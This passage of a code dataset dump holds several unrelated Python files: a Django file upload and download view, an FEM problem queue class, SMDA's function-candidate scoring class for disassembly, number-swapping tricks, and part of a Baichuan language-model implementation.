根据key再去cos获取文件Etag和\"db7c0d83e50474f934fd4ddf059406e5\"\n\n # 把获取到的数据写入数据库即可\n form = FilePutModelForm(request, data=request.POST)\n if form.is_valid():\n # 通过ModelForm.save存储到数据库中的数据返回的isntance对象,无法通过get_xx_display获取choice的中文\n form.instance.file_type = 1\n\n form.instance.project = request.tracer.project\n form.instance.update_user = request.tracer.user\n form.instance.parent_id = request.POST.get(\"parent\")\n instance = form.save() # 添加成功之后,获取到新添加的那个对象(instance.id,instance.name,instance.file_type,instace.get_file_type_display()\n\n # 校验通过:数据写入到数据库\n\n # 项目的已使用空间:更新 (data_dict['file_size'])\n request.tracer.project.use_space += instance.file_size\n request.tracer.project.save()\n\n result = {\n 'id': instance.id,\n 'name': instance.name,\n 'file_size': instance.file_size,\n \"file_path\": instance.file_path,\n 'username': instance.update_user.username,\n 'datetime': instance.update_datetime.strftime('%Y{y}%m{m}%d{d} %H:%M').format(y='年', m='月', d='日'),\n 'download_url': reverse('web:file_download', kwargs={\"project_id\": project_id, 'file_id': instance.id})\n }\n return JsonResponse({'status': True, 'data': result})\n\n return JsonResponse({'status': False, 'data': form.errors})\n\n\ndef file_download(request, project_id, file_id):\n \"\"\" 下载文件 \"\"\"\n\n file_object = models.FileRepository.objects.filter(id=file_id, project_id=project_id).first()\n res = requests.get(file_object.file_path)\n\n # 文件分块处理(适用于大文件)\n data = res.iter_content()\n\n # 设置content_type=application/octet-stream 用于提示下载框\n response = HttpResponse(data, content_type=\"application/octet-stream\")\n from django.utils.encoding import escape_uri_path\n\n # 设置响应头:中文件文件名转义\n response['Content-Disposition'] = \"attachment; filename={};\".format(escape_uri_path(file_object.name))\n return response","repo_name":"WangKeSai/Task-tracking-system","sub_path":"bishe/web/views/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":8088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40652434704","text":"import numpy as np\n\nfrom modules.swarm_environments.mesh.mesh_refinement.fem_problem_circular_queue import FEMProblemCircularQueue\nfrom typing import Dict, Any, Union\n\n\nclass EvaluationFEMProblemCircularQueue(FEMProblemCircularQueue):\n def __init__(self, *,\n fem_config: Dict[Union[str, int], Any],\n random_state: np.random.RandomState = np.random.RandomState()):\n super().__init__(fem_config=fem_config, random_state=random_state)\n self._index_sampler = None\n num_pdes = fem_config.get(\"num_pdes\") # number of pdes to store. None, 0 or -1 means infinite\n self._current_index = 0\n self._max_index = num_pdes\n\n def next(self) -> None:\n \"\"\"\n Draws the next finite element problem. This method is called at the beginning of each episode and draws a\n (potentially new) finite element problem from the buffer.\n Returns:\n\n \"\"\"\n pde_idx = self._current_index % self._max_index\n self._current_index += 1\n\n return self._next_from_idx(pde_idx=pde_idx)\n\n @property\n def num_pdes(self):\n return self._max_index\n","repo_name":"NiklasFreymuth/ASMR","sub_path":"modules/swarm_environments/mesh/mesh_refinement/evaluation/evaluation_fem_problem_circular_queue.py","file_name":"evaluation_fem_problem_circular_queue.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"73230481691","text":"from binascii import hexlify\n\nfrom .definitions import COMMON_PROLOGUES\n\nclass FunctionCandidate(object):\n\n def __init__(self, binary_info, addr):\n self.bitness = binary_info.bitness\n self.addr = addr\n rel_start_addr = addr - binary_info.base_addr\n self.bytes = binary_info.binary[rel_start_addr:rel_start_addr + 5]\n self.lang_spec = None\n self.call_ref_sources = []\n self.finished = False\n self.is_symbol = False\n self.is_gap_candidate = False\n self.is_tailcall = False\n self.alignment = 0\n if addr % 4 == 0:\n self.alignment = 4\n elif addr % 16 == 0:\n self.alignment = 16\n self.analysis_aborted = False\n self.abortion_reason = \"\"\n self._score = None\n self._tfidf_score = None\n self._confidence = None\n self.function_start_score = None\n self.is_stub = False\n self.is_initial_candidate = False\n self.is_exception_handler = False\n\n def setTfIdf(self, tfidf_score):\n self._tfidf_score = tfidf_score\n\n def getTfIdf(self):\n return round(self._tfidf_score, 3)\n\n def getConfidence(self):\n if self._confidence is None:\n # based on evaluation over Andriesse, Bao, and Plohmann data sets\n weighted_confidence = 0.298 * (1 if self.hasCommonFunctionStart() else 0)\n if self._tfidf_score is not None:\n weighted_confidence += (\n 0.321 * (1 if self._tfidf_score < 0 else 0) +\n 0.124 * (1 if self._tfidf_score < -2 else 0) +\n 0.120 * (1 if self._tfidf_score < -4 else 0) +\n 0.101 * (1 if self._tfidf_score < -1 else 0) +\n 0.025 * (1 if self._tfidf_score < -8 else 0)\n )\n # above experiments show that multiple inbound call references are basically always indeed functions\n if len(self.call_ref_sources) > 1:\n self._confidence = 1.0\n # initially recognized candidates are also almost always functions as they follow this heuristic\n elif self.is_initial_candidate:\n self._confidence = round(0.5 + 0.5 * (weighted_confidence), 3)\n else:\n self._confidence = round(weighted_confidence, 3)\n return self._confidence\n\n def hasCommonFunctionStart(self):\n for length in sorted([int(l) for l in COMMON_PROLOGUES], reverse=True):\n byte_sequence = self.bytes[:length]\n if byte_sequence in COMMON_PROLOGUES[\"%d\" % length][self.bitness]:\n return True\n return False\n\n def getFunctionStartScore(self):\n if self.function_start_score is None:\n for length in sorted([int(l) for l in COMMON_PROLOGUES], reverse=True):\n byte_sequence = self.bytes[:length]\n if byte_sequence in COMMON_PROLOGUES[\"%d\" % length][self.bitness]:\n self.function_start_score = COMMON_PROLOGUES[\"%d\" % length][self.bitness][byte_sequence]\n break\n self.function_start_score = self.function_start_score if self.function_start_score else 0\n return self.function_start_score\n\n def addCallRef(self, source_addr):\n if source_addr not in self.call_ref_sources:\n self.call_ref_sources.append(source_addr)\n self._score = None\n\n def removeCallRefs(self, source_addrs):\n for addr in source_addrs:\n if addr in self.call_ref_sources:\n self.call_ref_sources.remove(addr)\n self._score = None\n\n def setIsTailcallCandidate(self, is_tailcall):\n self.is_tailcall = is_tailcall\n\n def setInitialCandidate(self, initial):\n self.is_initial_candidate = initial\n\n def setIsGapCandidate(self, gap):\n self.is_gap_candidate = gap\n\n def setLanguageSpec(self, lang_spec):\n self.lang_spec = lang_spec\n self._score = None\n\n def setIsSymbol(self, is_symbol):\n self.is_symbol = is_symbol\n self._score = None\n\n def setIsExceptionHandler(self, is_exception_handler):\n self.is_exception_handler = is_exception_handler\n self._score = None\n\n def setIsStub(self, is_stub):\n self.is_stub = is_stub\n self._score = None\n\n def setAnalysisAborted(self, reason):\n self.finished = True\n self.analysis_aborted = True\n self.abortion_reason = reason\n\n def setAnalysisCompleted(self):\n self.finished = True\n\n def isFinished(self):\n return self.finished\n\n def calculateScore(self):\n score = 0\n score += 10000 if self.is_symbol else 0\n score += 5000 if self.is_exception_handler else 0\n score += 1000 if self.is_stub else 0\n score += 100 if self.lang_spec is not None else 0\n score += self.getFunctionStartScore()\n num_call_refs = len(self.call_ref_sources)\n if num_call_refs >= 10:\n call_ref_score = 10 + int(num_call_refs / 10)\n else:\n call_ref_score = num_call_refs\n score += 10 * call_ref_score\n score += 1 if self.alignment else 0\n return score\n\n def getScore(self):\n if self._score is None:\n self._score = self.calculateScore()\n return self._score\n\n def __lt__(self, other):\n own_score = self.getScore()\n other_score = other.getScore()\n if own_score == other_score:\n return self.addr > other.addr\n return own_score < other_score\n\n def getCharacteristics(self):\n is_aligned = \"a\" if self.alignment else \"-\"\n is_finished = \"f\" if self.finished else \"-\"\n is_gap = \"g\" if self.is_gap_candidate else \"-\"\n is_initial = \"i\" if self.is_initial_candidate else \"-\"\n is_lang_spec = \"l\" if self.lang_spec is not None else \"-\"\n is_prologue = \"p\" if self.hasCommonFunctionStart() else \"-\"\n is_ref = \"r\" if self.call_ref_sources else \"-\"\n is_symbol = \"s\" if self.is_symbol else \"-\"\n is_tailcall = \"t\" if self.is_tailcall else \"-\"\n is_stub = \"u\" if self.is_stub else \"-\"\n is_aborted = \"x\" if self.analysis_aborted else \"-\"\n characteristics = is_initial + is_symbol + is_stub + is_aligned + is_lang_spec + is_prologue + is_ref + is_tailcall + is_gap + is_finished + is_aborted\n return characteristics\n\n def __str__(self):\n characteristics = self.getCharacteristics()\n prologue_score = \"%d\" % self.getFunctionStartScore()\n ref_summary = \"{}\".format(len(self.call_ref_sources)) if len(self.call_ref_sources) != 1 else \"{}: 0x{:x}\".format(len(self.call_ref_sources), self.call_ref_sources[0])\n return \"0x{:x}: {} -> {} (total score: {}), inref: {} | {}\".format(self.addr, hexlify(self.bytes), prologue_score, self.getScore(), ref_summary, characteristics)\n\n def toJson(self):\n return {\n \"addr\": self.addr,\n \"bytes\": self.bytes.hex(),\n \"alignment\": self.alignment,\n \"reason\": self.abortion_reason,\n \"num_refs\": len(self.call_ref_sources),\n \"characteristics\": self.getCharacteristics(),\n \"prologue_score\": self.getFunctionStartScore(),\n \"score\": self.calculateScore(),\n \"confidence\": self.getConfidence()\n }\n","repo_name":"danielplohmann/smda","sub_path":"smda/intel/FunctionCandidate.py","file_name":"FunctionCandidate.py","file_ext":"py","file_size_in_byte":7348,"program_lang":"python","lang":"en","doc_type":"code","stars":204,"dataset":"github-code","pt":"32"} +{"seq_id":"13234781770","text":"# Two ways of swapping values between variables without a third variable\n\n# First one, using arithmetic:\ndef swap_numbers(a, b):\n a = a - b\n b = a + b\n a = b - a\n return a, b\n\n# Second one, using xor operator:\ndef swap_numbers_xor(a, b):\n a = a ^ b\n b = a ^ b\n a = a ^ b\n return a, b\n\n","repo_name":"lucasbracher/classic_problems_in_python","sub_path":"tricks/swap_numbers.py","file_name":"swap_numbers.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29359755430","text":"import glob\n\nfrom transformers.deepspeed import is_deepspeed_zero3_enabled\n\nfrom ...utils.torch_utils import skip_init\nfrom .configuration_baichuan import BaichuanConfig\nfrom .generation_utils import build_chat_input, TextIterStreamer\n\nimport math\nfrom threading import Thread\nfrom typing import List, Optional, Tuple, Union\n\nimport torch\nfrom torch import nn\nfrom torch.nn import CrossEntropyLoss\nfrom torch.nn import functional as F\nfrom transformers import PreTrainedModel, PretrainedConfig\nfrom transformers.activations import ACT2FN\nfrom transformers.generation.utils import GenerationConfig\nfrom transformers.modeling_outputs import BaseModelOutputWithPast, CausalLMOutputWithPast\nfrom transformers.utils import logging, ContextManagers\n\nimport os\nfrom contextlib import contextmanager\nfrom accelerate import init_empty_weights\n\nlogger = logging.get_logger(__name__)\n\ndef default_init(cls, *args, **kwargs):\n return cls(*args, **kwargs)\nskip_init_function = skip_init\ndef setup_model_profile(skip_init_flag=True):\n global skip_init_function\n if skip_init_flag:\n skip_init_function = skip_init\n else:\n skip_init_function = default_init\n\ntry:\n from xformers import ops as xops\nexcept ImportError:\n xops = None\n logger.warning(\n \"Xformers is not installed correctly. If you want to use memory_efficient_attention to accelerate training use the following command to install Xformers\\npip install xformers.\"\n )\n\n\ndef _get_interleave(n):\n def _get_interleave_power_of_2(n):\n start = 2 ** (-(2 ** -(math.log2(n) - 3)))\n ratio = start\n return [start * ratio**i for i in range(n)]\n\n if math.log2(n).is_integer():\n return _get_interleave_power_of_2(n)\n else:\n closest_power_of_2 = 2 ** math.floor(math.log2(n))\n return (\n _get_interleave_power_of_2(closest_power_of_2)\n + _get_interleave(2 * closest_power_of_2)[0::2][: n - closest_power_of_2]\n )\n\n\ndef _fill_with_neg_inf(t):\n \"\"\"FP16-compatible function that fills a tensor with -inf.\"\"\"\n return t.float().fill_(float(\"-inf\")).type_as(t)\n\n\ndef _buffered_future_mask(tensor, maxpos, alibi, attn_heads):\n _future_mask = torch.triu(_fill_with_neg_inf(torch.zeros([maxpos, maxpos])), 1)\n _future_mask = _future_mask.unsqueeze(0) + alibi\n new_future_mask = _future_mask.to(tensor)\n return new_future_mask[: tensor.shape[0] * attn_heads, :maxpos, :maxpos]\n\n\ndef _gen_alibi_mask(tensor, n_head, max_pos):\n slopes = torch.Tensor(_get_interleave(n_head))\n position_point = torch.arange(max_pos) - max_pos + 1\n position_point = position_point.unsqueeze(0).unsqueeze(0).expand(n_head, -1, -1)\n diag = torch.diag(position_point[0])\n position_point = position_point - diag.unsqueeze(0).unsqueeze(0).transpose(-1, -2)\n alibi = slopes.unsqueeze(1).unsqueeze(1) * position_point\n alibi = alibi.view(n_head, 1, max_pos)\n alibi_mask = torch.triu(_fill_with_neg_inf(torch.zeros([max_pos, max_pos])), 1)\n alibi_mask = alibi_mask.unsqueeze(0) + alibi\n return alibi_mask\n\n\nclass RMSNorm(torch.nn.Module):\n def __init__(self, hidden_size, epsilon=1e-6,**kwargs):\n super().__init__()\n self.weight = torch.nn.Parameter(torch.empty(hidden_size,**kwargs))\n self.epsilon = epsilon\n\n def forward(self, hidden_states):\n variance = hidden_states.to(torch.float32).pow(2).mean(-1, keepdim=True)\n hidden_states = hidden_states * torch.rsqrt(variance + self.epsilon)\n\n # convert into half-precision\n if self.weight.dtype in [torch.float16, torch.bfloat16]:\n hidden_states = hidden_states.to(self.weight.dtype)\n\n return self.weight * hidden_states\n\n\nclass MLP(torch.nn.Module):\n def __init__(\n self,\n hidden_size: int,\n intermediate_size: int,\n hidden_act: str,**kwargs\n ):\n super().__init__()\n self.gate_proj = torch.nn.Linear(hidden_size, intermediate_size, bias=False,**kwargs)\n self.down_proj = torch.nn.Linear(intermediate_size, hidden_size, bias=False,**kwargs)\n self.up_proj = torch.nn.Linear(hidden_size, intermediate_size, bias=False,**kwargs)\n self.act_fn = ACT2FN[hidden_act]\n\n def forward(self, x):\n return self.down_proj(self.act_fn(self.gate_proj(x)) * self.up_proj(x))\n\n\nclass BaichuanAttention(torch.nn.Module):\n def __init__(self, config: BaichuanConfig,**kwargs):\n super().__init__()\n self.config = config\n self.hidden_size = config.hidden_size\n self.num_heads = config.num_attention_heads\n self.head_dim = self.hidden_size // self.num_heads\n self.max_position_embeddings = config.model_max_length\n\n if (self.head_dim * self.num_heads) != self.hidden_size:\n raise ValueError(\n f\"hidden_size {self.hidden_size} is not divisible by num_heads {self.num_heads}\"\n )\n global skip_init_function\n init_method = skip_init_function\n self.W_pack = init_method(torch.nn.Linear,\n self.hidden_size, 3 * self.hidden_size, bias=False,**kwargs\n )\n self.o_proj = init_method(torch.nn.Linear,\n self.num_heads * self.head_dim, self.hidden_size, bias=False,**kwargs\n )\n\n def _shape(self, tensor: torch.Tensor, seq_len: int, bsz: int):\n return (\n tensor.view(bsz, seq_len, self.num_heads, self.head_dim)\n .transpose(1, 2)\n .contiguous()\n )\n\n def forward(\n self,\n hidden_states: torch.Tensor,\n attention_mask: Optional[torch.Tensor] = None,\n past_key_value: Optional[Tuple[torch.Tensor]] = None,\n output_attentions: bool = False,\n use_cache: bool = False,\n ) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]:\n bsz, q_len, _ = hidden_states.size()\n\n proj = self.W_pack(hidden_states)\n proj = (\n proj.unflatten(-1, (3, self.hidden_size))\n .unsqueeze(0)\n .transpose(0, -2)\n .squeeze(-2)\n )\n query_states = (\n proj[0].view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2)\n )\n key_states = (\n proj[1].view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2)\n )\n value_states = (\n proj[2].view(bsz, q_len, self.num_heads, self.head_dim).transpose(1, 2)\n )\n\n kv_seq_len = key_states.shape[-2]\n if past_key_value is not None:\n kv_seq_len += past_key_value[0].shape[-2]\n\n if past_key_value is not None:\n # reuse k, v, self_attention\n key_states = torch.cat([past_key_value[0], key_states], dim=2)\n value_states = torch.cat([past_key_value[1], value_states], dim=2)\n\n past_key_value = (key_states, value_states) if use_cache else None\n if xops is not None and self.training:\n attn_weights = None\n # query_states = query_states.transpose(1, 2)\n # key_states = key_states.transpose(1, 2)\n # value_states = value_states.transpose(1, 2)\n # attn_output = xops.memory_efficient_attention(\n # query_states, key_states, value_states, attn_bias=attention_mask\n # )\n with torch.backends.cuda.sdp_kernel(enable_flash=True, enable_math=True, enable_mem_efficient=True):\n attn_output = F.scaled_dot_product_attention(query_states, key_states, value_states, attn_mask = attention_mask)\n attn_output = attn_output.transpose(1, 2)\n else:\n attn_weights = torch.matmul(\n query_states, key_states.transpose(2, 3)\n ) / math.sqrt(self.head_dim)\n\n if attention_mask is not None:\n if q_len == 1: # inference with cache\n if len(attention_mask.size()) == 4:\n attention_mask = attention_mask[:, :, -1:, :]\n else:\n attention_mask = attention_mask[:, -1:, :]\n attn_weights = attn_weights + attention_mask\n attn_weights = torch.max(\n attn_weights, torch.tensor(torch.finfo(attn_weights.dtype).min)\n )\n\n attn_weights = torch.nn.functional.softmax(attn_weights, dim=-1)\n attn_output = torch.matmul(attn_weights, value_states)\n\n attn_output = attn_output.transpose(1, 2)\n attn_output = attn_output.reshape(bsz, q_len, self.hidden_size)\n attn_output = self.o_proj(attn_output)\n\n if not output_attentions:\n attn_weights = None\n\n return attn_output, attn_weights, past_key_value\n\n\nclass BaichuanLayer(torch.nn.Module):\n def __init__(self, config: BaichuanConfig,**kwargs):\n super().__init__()\n self.hidden_size = config.hidden_size\n global skip_init_function\n init_method = skip_init_function\n\n self.self_attn = BaichuanAttention(config=config,**kwargs)\n self.mlp = init_method(MLP,\n hidden_size=self.hidden_size,\n intermediate_size=config.intermediate_size,\n hidden_act=config.hidden_act,**kwargs\n )\n self.input_layernorm = RMSNorm(config.hidden_size, epsilon=config.rms_norm_eps,**kwargs)\n self.post_attention_layernorm = RMSNorm(\n config.hidden_size, epsilon=config.rms_norm_eps,**kwargs\n )\n\n def forward(\n self,\n hidden_states: torch.Tensor,\n attention_mask: Optional[torch.Tensor] = None,\n past_key_value: Optional[Tuple[torch.Tensor]] = None,\n output_attentions: Optional[bool] = False,\n use_cache: Optional[bool] = False,\n ) -> Tuple[\n torch.FloatTensor, Optional[Tuple[torch.FloatTensor, torch.FloatTensor]]\n ]:\n residual = hidden_states\n\n hidden_states = self.input_layernorm(hidden_states)\n\n # Self Attention\n hidden_states, self_attn_weights, present_key_value = self.self_attn(\n hidden_states=hidden_states,\n attention_mask=attention_mask,\n past_key_value=past_key_value,\n output_attentions=output_attentions,\n use_cache=use_cache,\n )\n hidden_states = residual + hidden_states\n\n # Fully Connected\n residual = hidden_states\n hidden_states = self.post_attention_layernorm(hidden_states)\n hidden_states = self.mlp(hidden_states)\n hidden_states = residual + hidden_states\n\n outputs = (hidden_states,)\n\n if use_cache:\n outputs += (present_key_value,)\n\n return outputs\n\n\nclass BaichuanPreTrainedModel(PreTrainedModel):\n config_class = BaichuanConfig\n base_model_prefix = \"model\"\n supports_gradient_checkpointing = True\n _no_split_modules = [\"BaichuanLayer\"]\n _keys_to_ignore_on_load_unexpected = [r\"decoder\\.version\"]\n\n def _init_weights(self, module):\n global skip_init_function\n init_method = skip_init_function\n if init_method == skip_init:\n return\n\n std = self.config.initializer_range\n if isinstance(module, torch.nn.Linear):\n module.weight.data.normal_(mean=0.0, std=std)\n if module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, torch.nn.Embedding):\n module.weight.data.normal_(mean=0.0, std=std)\n if module.padding_idx is not None:\n module.weight.data[module.padding_idx].zero_()\n\n def _set_gradient_checkpointing(self, module, value=False):\n if isinstance(module, BaichuanModel):\n module.gradient_checkpointing = value\n\n def _get_resized_lm_head(\n self, old_lm_head: nn.Linear, new_num_tokens: Optional[int] = None, transposed: Optional[bool] = False\n ) :\n \"\"\"\n Build a resized Linear Module from a provided old Linear Module. Increasing the size will add newly initialized\n vectors at the end. Reducing the size will remove vectors from the end\n\n Args:\n old_lm_head (`torch.nn.Linear`):\n Old lm head liner layer to be resized.\n new_num_tokens (`int`, *optional*):\n New number of tokens in the linear matrix.\n\n Increasing the size will add newly initialized vectors at the end. Reducing the size will remove\n vectors from the end. If not provided or `None`, just returns a pointer to the input tokens\n `torch.nn.Linear` module of the model without doing anything. transposed (`bool`, *optional*, defaults\n to `False`): Whether `old_lm_head` is transposed or not. If True `old_lm_head.size()` is `lm_head_dim,\n vocab_size` else `vocab_size, lm_head_dim`.\n\n Return:\n `torch.nn.Linear`: Pointer to the resized Linear Module or the old Linear Module if `new_num_tokens` is\n `None`\n \"\"\"\n if new_num_tokens is None:\n return old_lm_head\n\n if is_deepspeed_zero3_enabled():\n import deepspeed\n\n with deepspeed.zero.GatheredParameters(old_lm_head.weight, modifier_rank=None):\n old_num_tokens, old_lm_head_dim = (\n old_lm_head.weight.size() if not transposed else old_lm_head.weight.t().size()\n )\n else:\n old_num_tokens, old_lm_head_dim = (\n old_lm_head.weight.size() if not transposed else old_lm_head.weight.t().size()\n )\n\n if old_num_tokens == new_num_tokens:\n return old_lm_head\n\n if not isinstance(old_lm_head, NormHead):\n raise TypeError(\n f\"Old language model head is of type {type(old_lm_head)}, which is not an instance of {nn.Linear}. You\"\n \" should either use a different resize function or make sure that `old_lm_head` are an instance of\"\n f\" {nn.Linear}.\"\n )\n\n # Build new lm head\n new_lm_head_shape = (old_lm_head_dim, new_num_tokens) if not transposed else (new_num_tokens, old_lm_head_dim)\n\n new_lm_head = NormHead(*new_lm_head_shape)\n new_lm_head = new_lm_head.to(old_lm_head.weight.device, dtype=old_lm_head.weight.dtype)\n\n # initialize new lm head (in particular added tokens)\n self._init_weights(new_lm_head)\n\n num_tokens_to_copy = min(old_num_tokens, new_num_tokens)\n\n # XXX: put the long block of code in a wrapper\n if is_deepspeed_zero3_enabled():\n import deepspeed\n\n params = [old_lm_head.weight, old_lm_head.bias, new_lm_head.weight, new_lm_head.bias]\n with deepspeed.zero.GatheredParameters(params, modifier_rank=0):\n if torch.distributed.get_rank() == 0:\n # Copy old lm head weights to new lm head\n if not transposed:\n new_lm_head.weight.data[:num_tokens_to_copy, :] = old_lm_head.weight.data[\n :num_tokens_to_copy, :\n ]\n else:\n new_lm_head.weight.data[:, :num_tokens_to_copy] = old_lm_head.weight.data[\n :, :num_tokens_to_copy\n ]\n\n\n else:\n # Copy old lm head weights to new lm head\n if not transposed:\n new_lm_head.weight.data[:num_tokens_to_copy, :] = old_lm_head.weight.data[:num_tokens_to_copy, :]\n else:\n new_lm_head.weight.data[:, :num_tokens_to_copy] = old_lm_head.weight.data[:, :num_tokens_to_copy]\n\n\n return new_lm_head\n\n\nclass BaichuanModel(BaichuanPreTrainedModel):\n def __init__(self, config: BaichuanConfig,**kwargs):\n super().__init__(config)\n self.padding_idx = config.pad_token_id\n self.vocab_size = config.vocab_size\n self.n_head = config.num_attention_heads\n\n global skip_init_function\n init_method = skip_init_function\n\n self.embed_tokens = init_method(torch.nn.Embedding,\n config.vocab_size, config.hidden_size, self.padding_idx,**kwargs\n )\n self.layers = torch.nn.ModuleList(\n [BaichuanLayer(config,**kwargs) for _ in range(config.num_hidden_layers)]\n )\n self.norm = RMSNorm(config.hidden_size, epsilon=config.rms_norm_eps,**kwargs)\n\n self.gradient_checkpointing = config.gradient_checkpointing\n self.post_init()\n self.max_cache_pos = config.model_max_length\n self.first_run = True\n self.alibi_mask = None\n\n def get_input_embeddings(self):\n return self.embed_tokens\n\n def set_input_embeddings(self, value):\n self.embed_tokens = value\n\n def get_alibi_mask(self, tensor, seq_length_with_past):\n if self.training:\n slopes = torch.Tensor(_get_interleave(self.n_head))\n position_point = (\n torch.arange(seq_length_with_past) - seq_length_with_past + 1\n )\n position_point = (\n position_point.unsqueeze(0)\n .unsqueeze(0)\n .expand(self.n_head, seq_length_with_past, -1)\n )\n diag = torch.diag(position_point[0])\n position_point = position_point - diag.unsqueeze(0).unsqueeze(0).transpose(\n -1, -2\n )\n alibi = slopes.unsqueeze(1).unsqueeze(1) * position_point\n mask = _buffered_future_mask(\n tensor, seq_length_with_past, alibi, self.n_head\n )\n else:\n if self.first_run:\n self.first_run = False\n self.register_buffer(\n \"future_mask\",\n _gen_alibi_mask(tensor, self.n_head, self.max_cache_pos).to(\n tensor\n ),\n persistent=False,\n )\n if seq_length_with_past > self.max_cache_pos:\n self.max_cache_pos = seq_length_with_past\n self.register_buffer(\n \"future_mask\",\n _gen_alibi_mask(tensor, self.n_head, self.max_cache_pos).to(\n tensor\n ),\n persistent=False,\n )\n mask = self.future_mask[\n : self.n_head, :seq_length_with_past, :seq_length_with_past\n ]\n return mask\n\n def forward(\n self,\n input_ids: torch.LongTensor = None,\n attention_mask: Optional[torch.Tensor] = None,\n past_key_values: Optional[List[torch.FloatTensor]] = None,\n inputs_embeds: Optional[torch.FloatTensor] = None,\n use_cache: Optional[bool] = False,\n output_attentions: Optional[bool] = False,\n output_hidden_states: Optional[bool] = False,\n return_dict: Optional[bool] = True,\n ) -> Union[Tuple, BaseModelOutputWithPast]:\n if input_ids is not None and inputs_embeds is not None:\n raise ValueError(\n \"You cannot provide both input_ids and inputs_embeds simultaneously\"\n )\n elif input_ids is not None:\n batch_size, seq_length = input_ids.shape\n elif inputs_embeds is not None:\n batch_size, seq_length, _ = inputs_embeds.shape\n else:\n raise ValueError(\"You need to provide input_ids or inputs_embeds\")\n\n return_dict = (\n return_dict if return_dict is not None else self.config.use_return_dict\n )\n\n seq_length_with_past = seq_length\n\n if past_key_values is not None:\n past_key_values_length = past_key_values[0][0].shape[2]\n seq_length_with_past = seq_length_with_past + past_key_values_length\n\n if inputs_embeds is None:\n inputs_embeds = self.embed_tokens(input_ids)\n\n if self.training:\n if (\n self.alibi_mask is None\n or self.alibi_mask.shape[-1] != seq_length_with_past\n ):\n self.alibi_mask = self.get_alibi_mask(\n inputs_embeds, seq_length_with_past\n )\n alibi_mask = self.alibi_mask\n else:\n alibi_mask = self.get_alibi_mask(inputs_embeds, seq_length_with_past)\n\n\n if attention_mask is not None:\n if len(attention_mask.shape) == 2:\n expanded_mask = attention_mask.to(alibi_mask.dtype)\n expanded_mask = torch.tril(\n torch.gt(expanded_mask[:, :, None] * expanded_mask[:, None, :], 0)\n ) * torch.eq(expanded_mask[:, :, None] - expanded_mask[:, None, :], 0)\n else:\n expanded_mask = attention_mask\n bsz = inputs_embeds.size(0)\n src_len, tgt_len = alibi_mask.size()[-2:]\n expanded_mask = (\n expanded_mask.unsqueeze(1)\n .expand(bsz, 1, src_len, tgt_len)\n .to(alibi_mask.dtype)\n )\n inverted_mask = 1.0 - expanded_mask\n inverted_mask = inverted_mask.masked_fill(\n inverted_mask.to(torch.bool), torch.finfo(alibi_mask.dtype).min\n )\n attention_mask = inverted_mask + alibi_mask.unsqueeze(0)\n else:\n attention_mask = alibi_mask\n\n if attention_mask.size(-2) != seq_length:\n attention_mask = attention_mask[...,-seq_length:,:]\n\n hidden_states = inputs_embeds\n\n if self.gradient_checkpointing and self.training:\n if use_cache:\n logger.warning_once(\n \"`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`...\"\n )\n use_cache = False\n\n # decoder layers\n all_hidden_states = () if output_hidden_states else None\n all_self_attns = () if output_attentions else None\n next_decoder_cache = () if use_cache else None\n\n for idx, decoder_layer in enumerate(self.layers):\n if output_hidden_states:\n all_hidden_states += (hidden_states,)\n\n past_key_value = (\n past_key_values[idx] if past_key_values is not None else None\n )\n\n if self.gradient_checkpointing and self.training:\n\n def create_custom_forward(module):\n def custom_forward(*inputs):\n # None for past_key_value\n return module(*inputs, output_attentions, None)\n\n return custom_forward\n\n layer_outputs = torch.utils.checkpoint.checkpoint(\n create_custom_forward(decoder_layer),\n hidden_states,\n attention_mask,\n past_key_value,\n )\n else:\n layer_outputs = decoder_layer(\n hidden_states,\n attention_mask=attention_mask,\n past_key_value=past_key_value,\n output_attentions=output_attentions,\n use_cache=use_cache,\n )\n\n hidden_states = layer_outputs[0]\n\n if use_cache:\n next_decoder_cache += (layer_outputs[2 if output_attentions else 1],)\n\n if output_attentions:\n all_self_attns += (layer_outputs[1],)\n\n hidden_states = self.norm(hidden_states)\n\n # add hidden states from the last decoder layer\n if output_hidden_states:\n all_hidden_states += (hidden_states,)\n\n next_cache = next_decoder_cache if use_cache else None\n if not return_dict:\n return tuple(\n v\n for v in [hidden_states, next_cache, all_hidden_states, all_self_attns]\n if v is not None\n )\n return BaseModelOutputWithPast(\n last_hidden_state=hidden_states,\n past_key_values=next_cache,\n hidden_states=all_hidden_states,\n attentions=all_self_attns,\n )\n\n\nclass NormHead(nn.Module):\n def __init__(self, hidden_size, vocab_size, bias=False):\n super().__init__()\n self.weight = nn.Parameter(torch.empty((vocab_size, hidden_size)))\n nn.init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n self.first_flag = True\n\n def forward(self, hidden_states):\n if self.training:\n norm_weight = nn.functional.normalize(self.weight)\n elif self.first_flag:\n self.first_flag = False\n self.weight.data = nn.functional.normalize(self.weight)\n norm_weight = self.weight\n else:\n norm_weight = self.weight\n return nn.functional.linear(hidden_states, norm_weight)\n\n_init_weights = True\n@contextmanager\ndef no_init_weights(_enable=True):\n global _init_weights\n old_init_weights = _init_weights\n if _enable:\n _init_weights = False\n try:\n yield\n finally:\n _init_weights = old_init_weights\n\n\nclass BaichuanForCausalLM(BaichuanPreTrainedModel):\n def __init__(self, config, *model_args, **model_kwargs):\n super().__init__(config, *model_args, **model_kwargs)\n self.model = BaichuanModel(config)\n self.lm_head = NormHead(config.hidden_size, config.vocab_size, bias=False)\n self.quantized = False\n method = getattr(config, \"quantization_method\", \"cpm\")\n if method == \"cpm\":\n if getattr(config, \"quantization_bit\", 0) in [4, 8]:\n self.quantize(config.quantization_bit, empty_init=True)\n elif method == \"bnb\":\n if hasattr(config, \"quantization_config\") and config.quantization_config['load_in_4bit']:\n self.quantize_bnb(4)\n # Initialize weights and apply final processing\n self.post_init()\n\n def get_input_embeddings(self):\n return self.model.embed_tokens\n\n def set_input_embeddings(self, value):\n self.model.embed_tokens = value\n\n def 